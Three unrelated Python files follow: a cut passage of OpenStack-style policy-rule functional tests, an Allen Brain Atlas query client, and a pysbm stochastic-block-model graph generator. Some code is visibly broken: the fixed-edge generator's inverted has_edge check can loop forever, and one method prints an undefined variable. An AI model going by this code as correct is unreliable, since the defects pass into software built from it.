= jsonutils.loads(response.text) subject_id = subject['id'] path = self._url('/v1/subjects/%s' % subject_id) media_type = 'application/openstack-subjects-v1.1-json-patch' headers['content-type'] = media_type del headers['X-Roles'] data = jsonutils.dumps([ {'op': 'replace', 'path': '/name', 'value': 'new-name'}, ]) response = requests.patch(path, headers=headers, data=data) self.assertEqual(200, response.status_code) self.stop_servers() def test_subject_modification_fails_on_mismatched_tenant_ids(self): rules = { "context_is_admin": "role:admin", "default": "", "add_subject": "", "get_subject": "", "modify_subject": "'A-Fake-Tenant-Id':%(owner)s", "upload_subject": "", "get_subject_location": "", "delete_subject": "", "restricted": "not ('aki':%(container_format)s and role:_member_)", "download_subject": "role:admin or rule:restricted" } self.set_policy_rules(rules) self.start_servers(**self.__dict__.copy()) path = self._url('/v1/subjects') headers = self._headers({'content-type': 'application/json', 'X-Roles': 'admin'}) data = jsonutils.dumps({'name': 'subject-1', 'disk_format': 'aki', 'container_format': 'aki'}) response = requests.post(path, headers=headers, data=data) self.assertEqual(201, response.status_code) # Get the subject's ID subject = jsonutils.loads(response.text) subject_id = subject['id'] path = self._url('/v1/subjects/%s' % subject_id) media_type = 'application/openstack-subjects-v1.1-json-patch' headers['content-type'] = media_type del headers['X-Roles'] data = jsonutils.dumps([ {'op': 'replace', 'path': '/name', 'value': 'new-name'}, ]) response = requests.patch(path, headers=headers, data=data) self.assertEqual(403, response.status_code) self.stop_servers() def test_member_additions_works_for_owning_tenant_id(self): rules = { "context_is_admin": "role:admin", "default": "", "add_subject": "", "get_subject": "", "modify_subject": "", "upload_subject": "", "get_subject_location": "", "delete_subject": "", "restricted": "not ('aki':%(container_format)s and role:_member_)", "download_subject": "role:admin or rule:restricted", "add_member": "tenant:%(owner)s", } self.set_policy_rules(rules) self.start_servers(**self.__dict__.copy()) path = self._url('/v1/subjects') headers = self._headers({'content-type': 'application/json', 'X-Roles': 'admin'}) data = jsonutils.dumps({'name': 'subject-1', 'disk_format': 'aki', 'container_format': 'aki'}) response = requests.post(path, headers=headers, data=data) self.assertEqual(201, response.status_code) # Get the subject's ID subject = jsonutils.loads(response.text) subject_id = subject['id'] # Get the subject's members resource path = self._url('/v1/subjects/%s/members' % subject_id) body = jsonutils.dumps({'member': TENANT3}) del headers['X-Roles'] response = requests.post(path, headers=headers, data=body) self.assertEqual(200, response.status_code) self.stop_servers() def test_subject_additions_works_only_for_specific_tenant_id(self): rules = { "context_is_admin": "role:admin", "default": "", "add_subject": "'{0}':%(owner)s".format(TENANT1), "get_subject": "", "modify_subject": "", "upload_subject": "", "get_subject_location": "", "delete_subject": "", "restricted": "not ('aki':%(container_format)s and role:_member_)", "download_subject": "role:admin or rule:restricted", "add_member": "", } self.set_policy_rules(rules) self.start_servers(**self.__dict__.copy()) path = self._url('/v1/subjects') headers = self._headers({'content-type': 'application/json', 'X-Roles': 'admin', 'X-Tenant-Id': TENANT1}) data = jsonutils.dumps({'name': 'subject-1', 'disk_format': 'aki', 'container_format': 'aki'}) response = requests.post(path, headers=headers, data=data) self.assertEqual(201, response.status_code) headers['X-Tenant-Id'] = TENANT2 response = requests.post(path, headers=headers, data=data) self.assertEqual(403, response.status_code) self.stop_servers() def test_owning_tenant_id_can_retrieve_subject_information(self): rules = { "context_is_admin": "role:admin", "default": "", "add_subject": "", "get_subject": "tenant:%(owner)s", "modify_subject": "", "upload_subject": "", "get_subject_location": "", "delete_subject": "", "restricted": "not ('aki':%(container_format)s and role:_member_)", "download_subject": "role:admin or rule:restricted", "add_member": "", } self.set_policy_rules(rules) self.start_servers(**self.__dict__.copy()) path = self._url('/v1/subjects') headers = self._headers({'content-type': 'application/json', 'X-Roles': 'admin', 'X-Tenant-Id': TENANT1}) data = jsonutils.dumps({'name': 'subject-1', 'disk_format': 'aki', 'container_format': 'aki'}) response = requests.post(path, headers=headers, data=data) self.assertEqual(201, response.status_code) # Remove the admin role del headers['X-Roles'] # Get the subject's ID subject = jsonutils.loads(response.text) subject_id = subject['id'] # Can retrieve the subject as TENANT1 path = self._url('/v1/subjects/%s' % subject_id) response = requests.get(path, headers=headers) self.assertEqual(200, response.status_code) # Can retrieve the subject's members as TENANT1 path = self._url('/v1/subjects/%s/members' % subject_id) response = requests.get(path, headers=headers) self.assertEqual(200, response.status_code) headers['X-Tenant-Id'] = TENANT2 response = requests.get(path, headers=headers) self.assertEqual(403, response.status_code) self.stop_servers() def test_owning_tenant_can_publicize_subject(self): rules = { "context_is_admin": "role:admin", "default": "", "add_subject": "", "publicize_subject": "tenant:%(owner)s", "get_subject": "tenant:%(owner)s", "modify_subject": "", "upload_subject": "", "get_subject_location": "", "delete_subject": "", "restricted": "not ('aki':%(container_format)s and role:_member_)", "download_subject": "role:admin or rule:restricted", "add_member": "", } self.set_policy_rules(rules) self.start_servers(**self.__dict__.copy()) path = self._url('/v1/subjects') headers = self._headers({'content-type': 'application/json', 'X-Roles': 'admin', 'X-Tenant-Id': TENANT1}) data = jsonutils.dumps({'name': 'subject-1', 'disk_format': 'aki', 'container_format': 'aki'}) response = requests.post(path, headers=headers, data=data) self.assertEqual(201, response.status_code) # Get the subject's ID subject = jsonutils.loads(response.text) subject_id = subject['id'] path = self._url('/v1/subjects/%s' % subject_id) headers = self._headers({ 'Content-Type': 'application/openstack-subjects-v1.1-json-patch', 'X-Tenant-Id': TENANT1, }) doc = [{'op': 'replace', 'path': '/visibility', 'value': 'public'}] data = jsonutils.dumps(doc) response = requests.patch(path, headers=headers, data=data) self.assertEqual(200, response.status_code) def test_owning_tenant_can_delete_subject(self): rules = { "context_is_admin": "role:admin", "default": "", "add_subject": "", "publicize_subject": "tenant:%(owner)s", "get_subject": "tenant:%(owner)s", "modify_subject": "", "upload_subject": "", "get_subject_location": "", "delete_subject": "", "restricted": "not ('aki':%(container_format)s and role:_member_)", "download_subject": "role:admin or rule:restricted", "add_member": "", } self.set_policy_rules(rules) self.start_servers(**self.__dict__.copy()) path = self._url('/v1/subjects') headers = self._headers({'content-type': 'application/json', 'X-Roles': 'admin', 'X-Tenant-Id': TENANT1}) data = jsonutils.dumps({'name': 'subject-1', 'disk_format': 'aki', 'container_format': 'aki'}) response = requests.post(path, headers=headers, data=data)
<gh_stars>1-10 # -*- coding: utf-8 -*- import pandas as pd import os import sys import json import tqdm # import requests ## if we query xml # import xmltodict from gr_allenFISH_utils import ( check_gene_cached, check_gene_cached_images, check_cache_AtlasImage, # check_cache_AtlasDataFrame, load_cached_gene, load_cached_gene_images, load_cached_atlas_image, download_and_cache, download_and_cache_image, download_and_cache_AtlasImage, download_and_cache_AtlasImage_Annotated, Download_cache_AtlasDataFrame, extractStructureSVG, ) # from brainrender import base_dir from gr_io import request, fail_on_no_connection # from brainrender.actors import Volume from gr_sys_utils import base_dir import pdb class GeneRenderAPI: voxel_size = 200 # um grid_size = [58, 41, 67] # number of voxels along each direction sectionPlaneDict = {1:'coronal',2:'sagittal'} DOWNSAMPLE_FACTOR = 4 QUALITY_FACTOR = 50 aba_mouseBrain_atlas = 'http://api.brain-map.org/api/v2/structure_graph_download/1.json' all_genes_url = ( "http://api.brain-map.org/api/v2/data/query.json?criteria=" + "model::Gene," + "rma::criteria,products[abbreviation$eq'DevMouse']," + "rma::options,[tabular$eq'genes.id','genes.acronym+as+gene_symbol','genes.name+as+gene_name'," + "'genes.entrez_id+as+entrez_gene_id','genes.homologene_id+as+homologene_group_id']," + "[order$eq'genes.acronym']" + "&num_rows=all&start_row=0" ) gene_experiments_url = ( "http://api.brain-map.org/api/v2/data/query.json?criteria=model::SectionDataSet," + "rma::criteria,[failed$eq'false'],products[abbreviation$eq'Mouse'],genes[acronym$eq-GENE_SYMBOL-]" ) ## gridded data download_url = "http://api.brain-map.org/grid_data/download/EXP_ID?include=energy,intensity,density" ## xml query. more complex than json # download_url_full = "http://api.brain-map.org/api/v2/data/query.xml?criteria=model::SectionImage,rma::criteria,[data_set_id$eq-GENE_EXP_ID-]" ## section list download_url_full = "http://api.brain-map.org/api/v2/data/query.json?num_rows=all&criteria=model::SectionImage,rma::criteria,[data_set_id$eq-GENE_EXP_ID-]" ## thumbnail settings for nissl download_url_imageNissl_D = "http://api.brain-map.org/api/v2/image_download/-IMAGE_ID-?downsample=-DOWNSAMPLE_FACTOR-&quality=-QUALITY_FACTOR-" ## thumbnail settings for expression download_url_imageEXP_D = "http://api.brain-map.org/api/v2/image_download/-IMAGE_ID-?downsample=-DOWNSAMPLE_FACTOR-&quality=-QUALITY_FACTOR-&view=expression" ## section imagedata of Nissl-full-image download_url_imageNissl_F = "http://api.brain-map.org/api/v2/image_download/-IMAGE_ID-" ## section imagedata of EXPRESSION-full-image download_url_imageEXP_F = "http://api.brain-map.org/api/v2/image_download/-IMAGE_ID-?&view=expression" ##For each Structure in the input list, locate the closest image and (x,y) location in SectionDataSet 68545324: closed_image = "http://api.brain-map.org/api/v2/structure_to_image/-EXP_ID-.json?structure_ids=-STRUCTURE_ID-" ### Image-to_Atlas ##For Atlas 1 (P56 mouse), find the closest annotated SectionImage and (x,y) location as defined by a seed SectionImage and seed (x,y) location. closed_atlas1Image = "http://api.brain-map.org/api/v2/image_to_atlas/-IMAGE-ID.json?x=-X-&y=-Y-&atlas_id=1" gene_expression_cache = base_dir / "GriddedGeneExpressionCache" fish_images_cache = base_dir / "FishImagesCache" mouseAtlas_cache = base_dir / "ABA_mouseAtlas" adultMouse_atlas_path = mouseAtlas_cache /'aba_mouseAtlas.json' gene_name = None gene_exp_id = None atlas_df = [] def __init__(self): # Get metadata about all available genes self.genes = None # when necessary gene data can be downloaded with self.get_all_genes self.gene_expression_cache.mkdir(exist_ok=True) self.fish_images_cache.mkdir(exist_ok=True) self.mouseAtlas_cache.mkdir(exist_ok=True) self.load_atlas_df() def getAtlasImagesAnnoationList(self, atlasID, GraphicGroupLabel_id=28): ''' Returns list of atlasImage list with annotation ------- data : TYPE: list of str (atlas image numbers) Atlases that have AtlasImages annotated with Structure boundaries, and the relevant GraphicGroupLabel.ids Adult Mouse, 3D Coronal:Atlas ID 602630314, GraphicGrouLabels: [28] Mouse P56, Coronal: Atlas ID 1, GraphicGrouLabels: [28,159226751] Mouse P56, Sagitall: Atlas ID 2, GraphicGrouLabels: [28,159226751] ''' ##### all availabe list #url = "http://api.brain-map.org/api/v2/data/query.json?criteria=model::Atlas,rma::include,graphic_group_labels[name$il'Atlas*'],rma::options[only$eq'atlases.id,atlases.name,graphic_group_labels.id']" url = "http://api.brain-map.org/api/v2/data/query.csv?criteria=model::AtlasImage,rma::criteria,atlas_data_set(atlases[id$eq-ATLAS_ID-]),graphic_objects(graphic_group_label[id$eq-GRIPHIC_GROUP_LABEL_ID-]),rma::options[tabular$eq'sub_images.id'][order$eq'sub_images.id']&num_rows=all&start_row=0" url = url.replace("-ATLAS_ID-",str(atlasID)).replace("-GRIPHIC_GROUP_LABEL_ID-",str(GraphicGroupLabel_id)) atlasImageList = request(url).content.decode().split()[1:] atlasImageList =[int(j) for j in atlasImageList] return atlasImageList,atlasID, GraphicGroupLabel_id def getAtlasImageAnnotated(self, atlasImageID, atlasID,grahpicGroupID=28): ''' Download and caching annotaed atlas Parameters ---------- atlasImageID : TYPE, int DESCRIPTION. atlasID : TYPE, int DESCRIPTION. grahpicGroupID : TYPE, int, optional DESCRIPTION. The default is 28. Returns ------- None. ''' url = "http://api.brain-map.org/api/v2/atlas_image_download/-ATLAS_IMG_ID-?annotation=true&atlas=-ATLAS-ID-" url = url.replace('-ATLAS_IMG_ID-',str(atlasImageID)).replace('-ATLAS-ID-',str(atlasID)) download_and_cache_AtlasImage_Annotated(url, self.mouseAtlas_cache, atlasImageID, atlasID, grahpicGroupID) def getAtlasStructureDataFrame(self, atlasID,GraphicGroupLabel_id=28, use_cache=True): df_name = os.path.join(self.mouseAtlas_cache,'atlas_ID_'+str(atlasID)+'.pkl') if use_cache: if os.path.exists(df_name): cache=True else: cache=False else: cache=False if cache: print('Loading atlas dataframe from cache!') atlas_df = pd.read_pickle(df_name) else: atlasImageList,atlasID, GraphicGroupLabel_id = self.getAtlasImagesAnnoationList(atlasID,GraphicGroupLabel_id=28) url = "http://api.brain-map.org/api/v2/svg_download/-ALLAS_IMAGE_ID-?groups=-GRIPHIC_GROUP_LABEL_ID-" atlas_df = [] for j in atlasImageList: print(f'image {j}') url = url.replace("-ALLAS_IMAGE_ID-",str(j)).replace("-GRIPHIC_GROUP_LABEL_ID-",str(GraphicGroupLabel_id)) atlas_df.append(Download_cache_AtlasDataFrame(url, j, atlasID,GraphicGroupLabel_id)) atlas_df = pd.concat(atlas_df) atlas_df.to_pickle(df_name) return atlas_df def getAtlasStructrueImage(self,strAcronym, atlasImageID, atlasID,GraphicGroupLabel_id=28): ''' Extract a structure from atlas image Parameters ---------- strAcronym : TYPE DESCRIPTION. atlasImageID : TYPE DESCRIPTION. atlasID : TYPE DESCRIPTION. GraphicGroupLabel_id : TYPE, optional DESCRIPTION. The default is 28. Returns ------- list DESCRIPTION. ''' url = "http://api.brain-map.org/api/v2/svg_download/-ALLAS_IMAGE_ID-?groups=-GRIPHIC_GROUP_LABEL_ID-" url = url.replace("-ALLAS_IMAGE_ID-",str(atlasImageID)).replace("-GRIPHIC_GROUP_LABEL_ID-",str(GraphicGroupLabel_id)) q = self.get_structure_info(strAcronym) if len(q) > 0: strID = q['id'].values else: print(f'Structure {strAcronym} not found in atlas image {atlasImageID}') return [] strSVG = extractStructureSVG(url, strID) if len(strSVG) >0: filePath = os.path.join(self.mouseAtlas_cache,strAcronym+'_'+str(atlasImageID)+'.svg') with open(filePath, 'w') as file: file.write(strSVG) def getAtlasBoundaryImage(self,atlasImageID, atlasID,GraphicGroupLabel_id=28): ''' Download the structure boundary annotations (GraphicGroupLabel.id=28) for an AtlasImage (id=100960033) as a file (.svg): GraphicGroupLabels: https://help.brain-map.org/display/api/Atlas+Drawings+and+Ontologies http://api.brain-map.org/api/v2/data/query.xml?criteria=model::Atlas,rma::include,graphic_group_labels[name$il%27Atlas*%27],rma::options[only$eq%27atlases.id,atlases.name,graphic_group_labels.id%27] Mouse P56, Coronal: Atlas ID 1, GraphicGrouLabels: [28,159226751] Mouse P56, Sagitall: Atlas ID 2, GraphicGrouLabels: [28,159226751] Parameters ---------- imageID : TYPE DESCRIPTION. x : TYPE DESCRIPTION. y : TYPE DESCRIPTION. Returns ------- None. ''' fileExist = check_cache_AtlasImage(self.mouseAtlas_cache, atlasImageID, atlasID,GraphicGroupLabel_id) fileName = [] if fileExist: fileName = load_cached_atlas_image(self.mouseAtlas_cache,atlasImageID, atlasID,GraphicGroupLabel_id) else: url = "http://api.brain-map.org/api/v2/svg_download/-ALLAS_IMAGE_ID-?groups=-GRIPHIC_GROUP_LABEL_ID-" url = url.replace("-ALLAS_IMAGE_ID-",str(atlasImageID)).replace("-GRIPHIC_GROUP_LABEL_ID-",str(GraphicGroupLabel_id)) download_and_cache_AtlasImage(url, self.mouseAtlas_cache, atlasImageID, atlasID,GraphicGroupLabel_id) fileName = load_cached_atlas_image(self.mouseAtlas_cache,atlasImageID, atlasID,GraphicGroupLabel_id) return fileName def getExpTargetXY(self, expID, structureAcronym): ''' Structure-To-Image For a target structure, find the closest SectionImage within an experiment and (x,y) location as defined by the centroid of the Structure. Parameters ---------- expID : TYPE: Int Experiment ID. structureID : TYPE: Int Structure ID for a brain structure. Use function "get_structure_info()" to query with the structure's acyonmy as arugment. Returns ------- Json data: section_image_id: Closest SectionImage to the 3-D centroid of the structure. section_number: Section number of the closest SectionImage. x: Closest x pixel coordinate of the closest SectionImage. y: Closest y pixel coordinate of the closest SectionImage. ''' #closed_image = "http://api.brain-map.org/api/v2/structure_to_image/-EXP_ID-.json?structure_ids=-STRUCTURE_ID-" q = self.get_structure_info(structureAcronym) if len(q) > 0: structureID = q['id'].values print(f"{structureAcronym} ({(q['name'].values)[0]}) structure id: {structureID[0]}") url = self.closed_image.replace("-EXP_ID-", str(expID)).replace("-STRUCTURE_ID-", str(structureID[0])) data = request(url).json()["msg"][0]["image_sync"] return data else: print('data not found') return [] def synImageToAtlas(self, atlasID, imageID, seedLocation): baseUrl = "http://api.brain-map.org/api/v2/image_to_atlas/-SECTION_IMAGE_ID-.json?x=-X-&y=-Y-&atlas_id=-ATLAS_ID-" try: url = baseUrl.replace("-ATLAS_ID-", str(atlasID)).replace("-X-", str(seedLocation[0])).replace("-Y-", str(seedLocation[1])) url = url.replace("-SECTION_IMAGE_ID-", str(imageID)) return request(url).json()["msg"]["image_sync"] except: return [] def load_atlas_df(self): if len(self.atlas_df) < 1: self.atlas_df = self.get_aba_mouseAtlas() def get_structure_info(self, structureName): ''' From aba atlas json file get Structure information Parameters ---------- structureName : TYPE:str Allen Acyronym for a structure Returns ------- q : TYPE: pandas dataframe Information about structure if exist ''' df = self.atlas_df.copy() df['acronym']=[s.lower() for s in df['acronym']] q = df[df['acronym']==structureName.lower()] if len(q) >0: return q else: print(f'Structure {structureName} not found') return [] @fail_on_no_connection def get_aba_mouseAtlas(self): """ Load or download the "Mouse Brain Atlas" ontology as a hierarchically structured json file http://help.brain-map.org/display/api/Downloading+an+Ontology%27s+Structure+Graph """ if os.path.exists(self.adultMouse_atlas_path): with open(self.adultMouse_atlas_path) as json_file: aba_json = json.load(json_file) # print('openning saved atlas') else: aba_json = request(self.aba_mouseBrain_atlas).json()['msg'] with open(self.adultMouse_atlas_path, 'w') as outfile: json.dump(aba_json, outfile) root = []; out = []; aba_df = pd.DataFrame(self.flattenNestedJson(aba_json, root, out)) return aba_df def flattenNestedJson(self, njs, root, out): """ Flatten a nested json file Parameters ---------- njs : TYPE: nest json root : TYPE: [] DESCRIPTION. out : TYPE:[] output dictionary. Returns ------- out : TYPE: list output dictionary. """ for d in njs: if d['children'] == []: out.append(d) else: self.flattenNestedJson(d['children'], d, out) return out @fail_on_no_connection def get_all_genes(self): """ Download metadata about all the genes available in the Allen gene expression dataset """ res = request(self.all_genes_url) return pd.DataFrame(res.json()["msg"]) def get_gene_id_by_name(self, gene_name): self.gene_name = self.gene_name or gene_name if self.genes is None: self.genes = self.get_all_genes() if gene_name not in self.genes.gene_symbol.values: print( f"Gene name {gene_name} doesnt appear in the genes dataset, nothing to return\n" + "You can search for you gene here: https://mouse.brain-map.org/" ) return None else: return int( self.genes.loc[self.genes.gene_symbol == gene_name].id.values[ 0 ] ) def get_gene_symbol_by_id(self, gene_id): if self.genes is None: self.genes = self.get_all_genes() return self.genes.loc[ self.genes.id == str(gene_id) ].gene_symbol.values[0] @fail_on_no_connection def get_gene_experiments(self, gene): """ Given a gene_symbol it returns the list of ISH experiments for this gene as grided data :param gene_symbol: str """ url = self.gene_experiments_url.replace("-GENE_SYMBOL-", gene) data = request(url).json()["msg"] if not len(data): print(f"No experiment found for gene {gene}") return None else: return [d["id"] for d in data] @fail_on_no_connection def get_gene_experiments2(self, gene): """ Given a gene_symbol it returns the list of ISH experiments for this gene and full metaData :param gene_symbol: str """ url = self.gene_experiments_url.replace("-GENE_SYMBOL-", gene) try: data = request(url).json()["msg"] except: print('API not responding for url: ', url) return if not len(data): print(f"No experiment found for gene {gene}") return None, None else: try: ## may fail and return internet error! return [d["id"] for d in data], data except: return None, None @fail_on_no_connection def get_gene_experiments_imageList(self, geneExpID): """ Given a gene_experiment ID it returns the list of ISH imageIDs for this experiment :param geneExpID: str """ url = self.download_url_full.replace("-GENE_EXP_ID-", str(geneExpID)) # dict_data = xmltodict.parse(requests.get(url)) ## for xml query data = request(url).json()["msg"] if not len(data): print(f"No experiment found for gene {gene}") return None else: # nImages = int(dict_data['Response']['@total_rows']) # section_image = dict_data['Response']['section-images']['section-image'] ## list of OrderDict # return section_image # nImages = len(data) imgdict = sorted({img['id']:img['section_number'] for img in data}) imgIdx = {img['id']:idx for idx,img in enumerate(data)} sorted_data =[data[imgIdx[j]] for
<gh_stars>10-100 from __future__ import division import math import random as rd import networkx as nx import numpy as np from pysbm import sbm class NetworkSuppplier(object): """ Create different types of graphs""" STANDARD_SEED = 42 def __init__(self): self.partition_class = sbm.NxPartition def get_all_test_cases(self, include_directed=True, include_int_weighted=True): """ Returns test cases containing of: - each consisting at least out of graph and partition. Additionally some supply their real division into groups. """ test_cases = [] test_cases.extend(self.get_karate_network()) test_cases.extend(self.get_planted_partition(False)) if include_directed: test_cases.extend(self.get_planted_partition(True)) return test_cases def get_karate_network(self): """ Returns Zachary's Karate Club graph """ graph = nx.karate_club_graph() partition = self.partition_class(graph) # extract "ground truth" given by meta data # in the Data their are two groups, Mr. Hi and Officer # the information is saved in a node attribute named club meta_data_partition = [0 for _ in range(len(graph))] for node in graph.nodes_iter(): if graph.node[node]['club'] == 'Mr. Hi': meta_data_partition[node] = 1 return [(partition, 2, meta_data_partition)] def get_planted_partition(self, directed, number_of_instances_per_combination=5): """ Return some planted partition networks """ test_cases = [] for pout in range(1, 8): for pin in range(pout + 1, 11): for number_of_vertices in range(2, 11, 2): generator = PlantedPartitionGenerator(4, number_of_vertices, float(pin) / 10, float(pout) / 10) for number_of_different_instances in range(number_of_instances_per_combination): graph, number_of_blocks, real_partition = generator.generate( directed, self.STANDARD_SEED + number_of_different_instances) test_cases.append((self.partition_class(graph), number_of_blocks, real_partition)) return test_cases def get_sbm_generated_graphs(self): """ Return generated Graphs based on an SBM """ class SBMGenerator(object): """Generation of graphs based on given SBM""" PROBABILISTIC_EDGES = 'P' FIXED_NUMBER_OF_EDGES = 'D' def __init__(self, number_of_blocks, nodes_per_block, edge_matrix, type_of_edge_matrix, is_directed_edge_matrix=False): self._B = number_of_blocks self._nodes_per_block = nodes_per_block if len(nodes_per_block) != number_of_blocks: raise ValueError() self._edge_matrix = edge_matrix if type_of_edge_matrix not in {self.FIXED_NUMBER_OF_EDGES, self.PROBABILISTIC_EDGES}: raise ValueError() self._edge_type = type_of_edge_matrix self.random = np.random.RandomState() if len(self._edge_matrix) != number_of_blocks: raise ValueError() for block in range(self._B): if is_directed_edge_matrix: self._edge_matrix[block][block] = .5 * edge_matrix[block][block] if len(self._edge_matrix[block]) != number_of_blocks: raise ValueError() def generate(self, directed, seed): """Generate instance out of given data""" old_state = rd.getstate() rd.seed(seed) self.random = np.random.RandomState(seed) if self._edge_type == self.FIXED_NUMBER_OF_EDGES: info = self._generate_fixed(directed) # elif self._edge_type == self.PROBABILISTIC_EDGES: info = self._generate_probabilistic(directed) rd.setstate(old_state) return info def _generate_probabilistic(self, directed): """Generate graph with sampling each possible edge""" if directed: graph = nx.DiGraph() else: graph = nx.Graph() # determine total number of nodes and add every node to the graph total_nodes = sum(self._nodes_per_block) graph.add_nodes_from(range(total_nodes)) real_partition = {} # save actual block and count down to next block same for to_block from_block = 0 next_from_block_in = self._nodes_per_block[from_block] # print(self._edge_matrix) # for each possible edge test the probability for node_from in range(total_nodes): # check at the beginning and decrease at the end # to ensure that in the last loop no index error is raised if next_from_block_in == 0: from_block += 1 next_from_block_in = self._nodes_per_block[from_block] # create real partition real_partition[node_from] = from_block # reset to block info # in undirected case only sample one way if directed: to_nodes = range(total_nodes) to_block = 0 next_to_block_in = self._nodes_per_block[to_block] else: to_nodes = range(node_from, total_nodes) to_block = from_block next_to_block_in = next_from_block_in for node_to in to_nodes: # as above check here and decrease add the end of the cycle if next_to_block_in == 0: to_block += 1 next_to_block_in = self._nodes_per_block[to_block] # add random edge if rd.random() < self._get_edge_probability(node_from, node_to, from_block, to_block): graph.add_edge(node_from, node_to) next_to_block_in -= 1 next_from_block_in -= 1 return graph, self._B, real_partition def _get_edge_probability(self, node_from, node_to, from_block, to_block): """ Return the probability of a certain edge between two nodes of two blocks in the probabilistic version """ # additional arguments are needed for degree corrected version return self._edge_matrix[from_block][to_block] def _generate_fixed(self, directed): """ Generate graph by distributing a fixed number of edges between randomly chosen block participants. """ if directed: graph = nx.DiGraph() else: graph = nx.Graph() # initiate data structure for sampling and add all nodes to the graph block_info = self._create_block_info(graph) # create real partition real_partition = {} # for block, number_of_nodes in enumerate(self._nodes_per_block): # real_partition.extend(number_of_nodes * [block]) # test if loop below works like loop above (just for dicts instead of lists counter = 0 for block in range(len(self._nodes_per_block)): for number_of_nodes in self._nodes_per_block[block]: real_partition[counter] = [block] counter += 1 # now sample all block -> block combinations and distribute randomly the edges # by choosing two random ends for each edge between two blocks for from_block in range(self._B): for to_block in range(self._B): # short way in undirected case if not directed and to_block > from_block: break # check value if (directed or from_block != to_block) \ and self._edge_matrix[from_block][to_block] > self._nodes_per_block[from_block] * \ self._nodes_per_block[to_block]: raise ValueError("Too many edges demanded. \nDemanded numeber: " + str(self._edge_matrix[from_block][to_block]) + "\npossible edges " + str(self._nodes_per_block[from_block] * self._nodes_per_block[to_block]) + "\nbetween blocks " + str(from_block) + "->" + str(to_block)) elif not directed and from_block == to_block \ and self._edge_matrix[from_block][to_block] > self._nodes_per_block[ from_block] * (self._nodes_per_block[to_block] + 1) / 2: raise ValueError("Too many edges demanded. \nDemanded numeber: " + str(self._edge_matrix[from_block][to_block]) + "\npossible edges " + str(self._nodes_per_block[from_block] * \ (self._nodes_per_block[to_block] + 1) / 2) + "\nbetween blocks " + str(from_block) + "->" + str(to_block)) # create exact the number of edges for _ in range(self._edge_matrix[from_block][to_block]): while True: from_node = self._get_random_block_element(from_block, block_info) to_node = self._get_random_block_element(to_block, block_info) # check if edge already exists else choose new! if graph.has_edge(from_node, to_node): graph.add_edge(from_node, to_node) break return graph, self._B, real_partition def _create_block_info(self, graph): """Prepare information for each block and add all nodes to the graph""" # first create for each block the right number of nodes and add them to the graph # and save a list of nodes belonging to each block block_to_node = [] actual_start_value = 0 for number_of_nodes in self._nodes_per_block: block_to_node.append(range(actual_start_value, actual_start_value + number_of_nodes)) graph.add_nodes_from(range(actual_start_value, actual_start_value + number_of_nodes)) actual_start_value += number_of_nodes return block_to_node # in degree corrected self reference is needed # pylint: disable=no-self-use def _get_random_block_element(self, block, block_info): """Return random element of a certain block""" return rd.choice(block_info[block]) class SBMGeneratorDegreeCorrected(SBMGenerator): """Generation of SBM with the degree corrected model""" _SAMPLE_SIZE = 50 def __init__(self, number_of_blocks, degree_distribution_per_block, edge_matrix, type_of_edge_matrix, is_directed_edge_matrix=False): self._degree_distribution_per_block = degree_distribution_per_block # flat degree distribution and create node_per_block array self._flattened_block_distribution = [] nodes_per_block = [] for block_distribution in degree_distribution_per_block: # if needed calculate probability if sum(block_distribution) != 1: total = sum(block_distribution) for i, value in enumerate(block_distribution): block_distribution[i] = value * 1.0 / total self._flattened_block_distribution.append(block_distribution) nodes_per_block.append(len(block_distribution)) # call old init method to do the rest super(SBMGeneratorDegreeCorrected, self).__init__( number_of_blocks, nodes_per_block, edge_matrix, type_of_edge_matrix, is_directed_edge_matrix) def _get_edge_probability(self, node_from, node_to, from_block, to_block): """ In degree corrected case take care of the probability of each node too. """ return self._edge_matrix[from_block][to_block] \ * self._flattened_block_distribution[node_from] \ * self._flattened_block_distribution[node_to] def _create_block_info(self, graph): # add second field for saving the samples node_list = super(SBMGeneratorDegreeCorrected, self)._create_block_info(graph) block_info = [] for nodes in node_list: block_info.append((nodes, [])) return block_info # in degree corrected self reference is needed # pylint: disable=no-self-use def _get_random_block_element(self, block, block_info): """Return random element of a certain block""" nodes, samples = block_info[block] # check if samples is empty if not samples: # draw multiple samples because this should speed up the generation samples.extend(self.random.choice(nodes, size=self._SAMPLE_SIZE, replace=True, p=self._degree_distribution_per_block[block])) return samples.pop() class PlantedPartitionGenerator(SBMGenerator): """Generator for Planted Partition Networks based on SBMGenerator""" def __init__(self, number_of_groups, number_of_vertices_in_each_group, edge_probability_in_group, edge_probability_between_groups): # create nodes per block array nodes_per_block = [number_of_vertices_in_each_group for _ in range(number_of_groups)] edge_matrix = [[edge_probability_between_groups if i != j else edge_probability_in_group for i in range(number_of_groups)] for j in range(number_of_groups)] # call old init method to do the rest super(PlantedPartitionGenerator, self).__init__( number_of_groups, nodes_per_block, edge_matrix, self.PROBABILISTIC_EDGES, is_directed_edge_matrix=False) class Comparator(object): """ Execute the different inference algorithm on a given test cases """ def __init__(self, test_cases, inference_algorithms, objective_function): self.test_cases = test_cases self.inference_algorithms = inference_algorithms self.objective_function = objective_function def execute_single_test(self, starting_partition, inference_class): test_partition = starting_partition.copy() inference = inference_class(starting_partition.graph, self.objective_function, test_partition) inference.infer_stochastic_block_model() return test_partition def execute_all_tests(self, repetitions=1, evaluate_only_objective_function=True): evaluated_results = [] partitions = [] for test_case in self.test_cases: if len(test_case) == 3: partition, number_of_blocks, real_partition = test_case result_evaluator = NormalizedMutualInformation(real_partition) elif len(test_case) == 1: partition = test_case[0] result_evaluator = ObjectiveFunctionEvaluator(self.objective_function) number_of_blocks = 8 else: raise ValueError("Too short test case") if evaluate_only_objective_function: result_evaluator = ObjectiveFunctionEvaluator(self.objective_function) for inference_class in self.inference_algorithms: for _ in range(repetitions): partition.random_partition(number_of_blocks) resulting_partition = self.execute_single_test( partition, inference_class) result = result_evaluator.evaluate(resulting_partition) evaluated_results.append(result) partitions.append(resulting_partition)
